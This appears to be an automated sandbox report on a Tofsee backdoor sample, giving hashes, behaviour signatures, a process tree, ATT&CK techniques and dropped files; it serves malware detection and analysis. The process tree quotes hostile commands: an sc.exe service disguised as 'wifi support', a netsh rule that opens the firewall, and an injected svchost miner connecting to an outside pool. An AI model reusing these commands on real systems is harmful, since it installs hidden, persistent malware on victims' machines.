Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    15-11-2020 23:22

General

  • Target

    7914e269d4b5bbc6d0f7b195e319de2467219b58334e4637aa06b6176afea206.exe

  • Size

    10.1MB

  • MD5

    229fce13dd32013ad5550ccd66cc9620

  • SHA1

    90630678b1100c0cdbc3100bdd91656ca6478399

  • SHA256

    7914e269d4b5bbc6d0f7b195e319de2467219b58334e4637aa06b6176afea206

  • SHA512

    53f7ed10967818c239508f91a0cd112a856331510a7ec7bc8898e4a636a634f09a9d1908ebaa489d6ef1f90a3144693154e44017e357d71f7dd06c73489f0be9

Malware Config

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Windows security bypass 2 TTPs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Modifies service 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 19 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7914e269d4b5bbc6d0f7b195e319de2467219b58334e4637aa06b6176afea206.exe
    "C:\Users\Admin\AppData\Local\Temp\7914e269d4b5bbc6d0f7b195e319de2467219b58334e4637aa06b6176afea206.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1112
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 552
      2⤵
      • Program crash
      PID:3428
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 676
      2⤵
      • Program crash
      PID:3340
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 724
      2⤵
      • Program crash
      PID:4036
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 848
      2⤵
      • Program crash
      PID:1012
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 864
      2⤵
      • Program crash
      PID:1000
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 924
      2⤵
      • Program crash
      PID:848
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 952
      2⤵
      • Program crash
      PID:3060
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\tukkyexh\
      2⤵
        PID:2704
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 804
        2⤵
        • Program crash
        PID:732
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 740
        2⤵
        • Program crash
        PID:580
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\zhwanluu.exe" C:\Windows\SysWOW64\tukkyexh\
        2⤵
          PID:2632
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 832
          2⤵
          • Program crash
          PID:3636
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 764
          2⤵
          • Program crash
          PID:900
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create tukkyexh binPath= "C:\Windows\SysWOW64\tukkyexh\zhwanluu.exe /d\"C:\Users\Admin\AppData\Local\Temp\7914e269d4b5bbc6d0f7b195e319de2467219b58334e4637aa06b6176afea206.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:1736
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 516
            2⤵
            • Program crash
            PID:3932
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1048
            2⤵
            • Program crash
            PID:3836
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description tukkyexh "wifi internet conection"
            2⤵
              PID:3392
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 828
              2⤵
              • Program crash
              PID:2756
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1048
              2⤵
              • Program crash
              PID:2112
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start tukkyexh
              2⤵
                PID:632
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1072
                2⤵
                • Program crash
                PID:1236
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 740
                2⤵
                • Program crash
                PID:644
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:3668
              • C:\Windows\SysWOW64\tukkyexh\zhwanluu.exe
                C:\Windows\SysWOW64\tukkyexh\zhwanluu.exe /d"C:\Users\Admin\AppData\Local\Temp\7914e269d4b5bbc6d0f7b195e319de2467219b58334e4637aa06b6176afea206.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:648
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 648 -s 580
                  2⤵
                  • Program crash
                  PID:3796
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Deletes itself
                  • Drops file in System32 directory
                  • Modifies service
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:3616
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o msr.pool.gntl.co.uk:40005 -u 5nFN8BzQ1qP3PkbVHj5ooXSENsHFHMAj51jbA7YySkuEH8nBDYWHhhFQjiwcVqb9H8Soz3YTG6SijYVz1ntV1TAa5qAMCwu+60000 -p x -k
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2696
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 648 -s 564
                  2⤵
                  • Program crash
                  PID:3448

              Network

              MITRE ATT&CK Matrix ATT&CK v6

              Persistence

              New Service

              1
              T1050

              Modify Existing Service

              2
              T1031

              Registry Run Keys / Startup Folder

              1
              T1060

              Privilege Escalation

              New Service

              1
              T1050

              Defense Evasion

              Disabling Security Tools

              1
              T1089

              Modify Registry

              3
              T1112

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\zhwanluu.exe
                MD5

                ad048cfa885c5e1a6c241247794b1623

                SHA1

                af3e7d62fdf1ae14253217384bc249ab921786ec

                SHA256

                7bec6189a256304249d7c6cba56621c1276683bb4bb97038a5cc9e9530c621c6

                SHA512

                173de70553daeacbe2772b29df94f9909ae020d787afe3e1f8dcd13c4ebc9a5a08c5d411adc41b30c410e55b26ae37e52f19c5ae6badceea4061fed1f3bc4508

              • C:\Windows\SysWOW64\tukkyexh\zhwanluu.exe
                MD5

                ad048cfa885c5e1a6c241247794b1623

                SHA1

                af3e7d62fdf1ae14253217384bc249ab921786ec

                SHA256

                7bec6189a256304249d7c6cba56621c1276683bb4bb97038a5cc9e9530c621c6

                SHA512

                173de70553daeacbe2772b29df94f9909ae020d787afe3e1f8dcd13c4ebc9a5a08c5d411adc41b30c410e55b26ae37e52f19c5ae6badceea4061fed1f3bc4508

              • memory/632-7-0x0000000000000000-mapping.dmp
              • memory/648-10-0x00000000010F0000-0x00000000010F1000-memory.dmp
                Filesize

                4KB

              • memory/648-9-0x0000000000CCC000-0x0000000000CCD000-memory.dmp
                Filesize

                4KB

              • memory/1112-1-0x0000000001220000-0x0000000001221000-memory.dmp
                Filesize

                4KB

              • memory/1112-0-0x0000000000D61000-0x0000000000D62000-memory.dmp
                Filesize

                4KB

              • memory/1736-5-0x0000000000000000-mapping.dmp
              • memory/2632-3-0x0000000000000000-mapping.dmp
              • memory/2696-23-0x000000000089259C-mapping.dmp
              • memory/2696-21-0x0000000000800000-0x00000000008F1000-memory.dmp
                Filesize

                964KB

              • memory/2704-2-0x0000000000000000-mapping.dmp
              • memory/3392-6-0x0000000000000000-mapping.dmp
              • memory/3616-15-0x0000000004D50000-0x0000000004F5F000-memory.dmp
                Filesize

                2.1MB

              • memory/3616-16-0x0000000003000000-0x0000000003006000-memory.dmp
                Filesize

                24KB

              • memory/3616-17-0x0000000003010000-0x0000000003020000-memory.dmp
                Filesize

                64KB

              • memory/3616-18-0x00000000030F0000-0x00000000030F5000-memory.dmp
                Filesize

                20KB

              • memory/3616-19-0x0000000009390000-0x000000000979B000-memory.dmp
                Filesize

                4.0MB

              • memory/3616-20-0x0000000003AF0000-0x0000000003AF7000-memory.dmp
                Filesize

                28KB

              • memory/3616-12-0x0000000000E69A6B-mapping.dmp
              • memory/3616-11-0x0000000000E60000-0x0000000000E75000-memory.dmp
                Filesize

                84KB

              • memory/3668-14-0x0000000000000000-mapping.dmp